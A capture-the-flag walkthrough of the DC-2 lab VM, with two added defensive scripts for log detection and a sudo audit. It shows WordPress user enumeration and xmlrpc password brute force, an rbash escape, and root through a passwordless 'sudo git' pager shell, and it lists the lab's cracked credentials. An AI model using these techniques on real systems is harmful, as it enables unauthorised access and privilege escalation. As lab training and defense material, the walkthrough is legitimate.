DC-2 Target Machine Penetration

1. Penetration Process

  • Host discovery: nmap -sP 192.168.0.1/24

  • Found DC-2's IP address: 192.168.0.131

  • After downloading the VM, you need to add a DNS entry for it to the hosts file

  • echo "192.168.0.131 dc-2" >> /etc/hosts

  • Once added, ping dc-2; if the ping succeeds, it worked

  • Next is port discovery:

nmap -sS -A -p- -oN /tmp/DC-2.txt 192.168.0.131
  • Result:
# Nmap 7.70 scan initiated Mon Apr 27 14:28:47 2020 as: nmap -sS -A -p- -oN /tmp/DC-2.txt 192.168.0.131
Nmap scan report for 192.168.0.131
Host is up (0.00033s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:F6:92:EE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.33 ms 192.168.0.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 27 14:29:04 2020 -- 1 IP address (1 host up) scanned in 17.46 seconds
  • Only 7744 (ssh) and 80 (http) are open

  • Look at HTTP first

  • It turns out to be a WordPress site

  • Also found a flag page

Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
  • The hint is to generate a wordlist with cewl
cewl -w /tmp/passwd.lst http://dc-2
  • Then use that wordlist to brute-force

  • WordPress also allows username enumeration

  • Here we scan with wpscan

    # Enumerate users first (the site is served over plain HTTP on port 80)
    wpscan --url http://dc-2/ --enumerate u
  • Usernames found:

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
  • Usernames: admin, jerry, tom

  • Then brute-force their passwords (the wordlist is the one we just generated with cewl)

wpscan --url http://dc-2 --usernames admin,jerry,tom --passwords /tmp/passwd.lst
  • Two passwords came out of the scan

    [+] Performing password attack on Xmlrpc against 3 user/s
    [SUCCESS] - jerry / adipiscing
    [SUCCESS] - tom / parturient
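From the defender's side, the two steps above (user enumeration through the REST users endpoint and the author-id pattern, then a password attack against xmlrpc.php) leave a distinctive trail in the web server's access log. The following is an added example, not code from the original post: it runs that detection over constructed Apache log lines; the thresholds and the choice of 192.168.0.21 as the scanning host are assumptions.

```python
import re
from collections import defaultdict

# Apache common/combined log prefix: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

USERS_ENDPOINT = "/wp-json/wp/v2/users"    # REST endpoint wpscan read above
AUTHOR_RE = re.compile(r"[?&]author=\d+")   # ?author=N author-id brute forcing

def analyse(lines, xmlrpc_threshold=20, author_threshold=3):
    """Return {ip: sorted finding names} for hosts that show the enumeration or attack patterns."""
    rest_hits, author_hits, xmlrpc_posts = defaultdict(int), defaultdict(int), defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                     # unparseable line; a real pipeline would count these
        ip, method, path = m["ip"], m["method"], m["path"]
        if USERS_ENDPOINT in path:
            rest_hits[ip] += 1
        if AUTHOR_RE.search(path):
            author_hits[ip] += 1
        if method == "POST" and path.startswith("/xmlrpc.php"):
            xmlrpc_posts[ip] += 1
    findings = defaultdict(list)
    for ip in rest_hits:                 # a single read of the users list is already a signal
        findings[ip].append("rest-user-enumeration")
    for ip, n in author_hits.items():
        if n >= author_threshold:
            findings[ip].append("author-id-enumeration")
    for ip, n in xmlrpc_posts.items():
        if n >= xmlrpc_threshold:
            findings[ip].append(f"xmlrpc-password-attack ({n} POSTs)")
    return {ip: sorted(f) for ip, f in findings.items()}

# Constructed sample log: one scanning host (assumed 192.168.0.21) and one ordinary visitor.
SCANNER, VISITOR = "192.168.0.21", "192.168.0.50"

def _line(ip, method, path, status, sec):
    return f'{ip} - - [27/Apr/2020:14:40:{sec:02d} +0800] "{method} {path} HTTP/1.1" {status} 512'

SAMPLE_LOG = (
    [_line(SCANNER, "GET", "/index.php/wp-json/wp/v2/users/?per_page=100&page=1", 200, 1)]
    + [_line(SCANNER, "GET", f"/?author={i}", 301, 1 + i) for i in range(1, 4)]
    + [_line(SCANNER, "POST", "/xmlrpc.php", 200, 10 + i) for i in range(25)]
    + [_line(VISITOR, "GET", "/index.php/flag", 200, 40)]
)

if __name__ == "__main__":
    for ip, hits in analyse(SAMPLE_LOG).items():
        print(ip, ", ".join(hits))
```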
  • Now it's time to log in to the admin panel and get a shell

  • Anyone who knows a bit of WordPress knows that http://dc-2/wp-admin/ gets you to the admin login

  • If you don't, brute-forcing directories works too

  • Then just logged in with one of the accounts

  • Found flag 2 in the pages

Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
  • Looked around, and also hammered at it with msf for a while~

  • Still couldn't get a shell

  • Another way?

  • Then it has to be SSH

  • The earlier scan showed SSH on port 7744

  • So let's try connecting with the two website passwords

ssh jerry@dc-2 -p 7744
  • Can't log in; insufficient permissions?

  • Try tom

ssh tom@dc-2 -p 7744
  • This one gets in

  • But~

tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$
tom@DC-2:~$
tom@DC-2:~$ id
-rbash: id: command not found
tom@DC-2:~$
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat
-rbash: cat: command not found
tom@DC-2:~$ sudo
-rbash: sudo: command not found
  • Even cat is restricted

  • The only option is to get the file over to my Kali machine and read it there

  • First check whether scp is available

  • It is~

scp flag3.txt root@192.168.0.21:/tmp
  • Then enter the password and it's done
root@kali:/tmp# cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
  • Lots of commands are restricted, and the running shell is rbash (echo $SHELL shows the current shell)

  • So let's try switching to bash

BASH_CMDS[a]=/bin/sh;a   # (found on Baidu; gives a temporary shell to work with)
# Still no commands after switching? Check the environment variables
echo $PATH
/home/tom/usr/bin
export PATH=$PATH:/bin:/usr/bin
# set the PATH ourselves
su jerry   # switch to jerry
  • Got in, and also saw flag4~

  • Let's see what flag4 says first

Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!
  • Roughly it means: use git to get out of here~

  • Let's first check things like history and sudo -l

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
  • git can be run as root without a password

  • I'm not really familiar with using this

  • Found a post on Baidu saying there's a buffer vulnerability

  • When git opens its pager, you can type a command to start bash

jerry@DC-2:~$ sudo git -p config
usage: git config [options]

Config file location
--global use global config file
--system use system config file
--local use repository config file
-f, --file <file> use given config file
--blob <blob-id> read config from given blob object

Action
--get get value: name [value-regex]
--get-all get all values: key [value-regex]
--get-regexp get values for regexp: name-regex [value-regex]
--get-urlmatch get value specific for the URL: section[.var] URL
--replace-all replace all matching variables: name value [value_regex]
--add add a new variable: name value
--unset remove a variable: name [value-regex]
--unset-all remove all matches: name [value-regex]
--rename-section rename section: old-name new-name
--remove-section remove a section: name
-l, --list list all
-e, --edit open an editor
--get-color <slot> find the color configured: [default]
--get-colorbool <slot>
find the color setting: [stdout-is-tty]
!bash
root@DC-2:/home/jerry# id
uid=0(root) gid=0(root) groups=0(root)
root@DC-2:/home/jerry#
  • Remember to make the terminal window smaller, otherwise the pager won't kick in~

  • And that's root
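The sudo -l entry above is exactly the finding a hardening review should catch before anyone reaches it. The following is an added example, not from the original post: it parses the text of sudo -l (jerry's entry from the session, plus a constructed service entry for contrast) and flags root NOPASSWD grants for commands that open an interactive pager or editor. The PAGER_OR_EDITOR list is an assumption and not exhaustive.

```python
import re

# `sudo -l` text: jerry's entry copied from the session above, plus a
# constructed, harmless entry for contrast.
SUDO_L_OUTPUT = r"""Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) /usr/sbin/service apache2 restart
"""

# Commands that hand the user an interactive pager or editor when run in a
# terminal; granted as root, that is effectively a root shell. Assumed, non-exhaustive.
PAGER_OR_EDITOR = {"git", "less", "more", "man", "vi", "vim", "nano"}

# Command entry shape: "(runas) TAG: TAG: /path/cmd args"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$")

def audit_sudo_l(text):
    """Return one (runas, command, tags, risks) tuple per command entry in `sudo -l` output."""
    findings = []
    in_commands = False
    for raw in text.splitlines():
        if raw.startswith("User ") and "may run" in raw:
            in_commands = True          # Defaults lines end here; command entries follow
            continue
        m = ENTRY_RE.match(raw) if in_commands else None
        if not m:
            continue
        runas = m["runas"].split(":")[0].strip()      # "(root : root)" -> "root"
        tags = [t.rstrip(":") for t in m["tags"].split()]
        cmd = m["cmd"]
        risks = []
        if runas in ("root", "ALL"):
            if cmd == "ALL" or cmd.rsplit("/", 1)[-1] in PAGER_OR_EDITOR:
                risks.append("interactive command runs as root")
            if "NOPASSWD" in tags:
                risks.append("no password required")
        findings.append((runas, cmd, tags, risks))
    return findings

def risky_entries(text):
    """Only the entries that carry at least one risk."""
    return [f for f in audit_sudo_l(text) if f[3]]

if __name__ == "__main__":
    for runas, cmd, tags, risks in audit_sudo_l(SUDO_L_OUTPUT):
        print(f"({runas}) {' '.join(tags) or '-'} {cmd}: {'; '.join(risks) or 'ok'}")
```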

root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a twet via @DCAU7.
  • !!!THE_END!!!

2. Important Information

# 1. Website admin passwords
user1:tom
passwd:parturient
user2:jerry
passwd:adipiscing

# Found later in the website's directory
define('DB_NAME', 'wordpressdb');
/** MySQL database username */
define('DB_USER', 'wpadmin');

/** MySQL database password */
define('DB_PASSWORD', '4uTiLL');